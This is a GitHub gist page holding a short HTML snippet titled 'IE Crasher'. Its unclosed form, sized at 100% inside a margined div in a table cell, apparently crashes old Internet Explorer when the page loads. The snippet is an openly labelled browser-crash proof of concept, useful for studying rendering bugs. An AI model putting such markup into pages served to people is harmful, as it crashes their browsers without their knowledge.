Skip to content

Instantly share code, notes, and snippets.

@PizzaLiu
Last active December 16, 2015 18:09
Show Gist options
  • Save PizzaLiu/5475799 to your computer and use it in GitHub Desktop.
Save PizzaLiu/5475799 to your computer and use it in GitHub Desktop.
<html><head> <style type="text/css"> #a { margin:0 10px 10px; } #b { width:100%; } </style> <title>IE Crasher</title> </head> <body> <table><tr><td> <div id="a"> <form id="b"> <input type="text" name="test"/> </div> </td><td width="1"></td></tr></table> </body></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment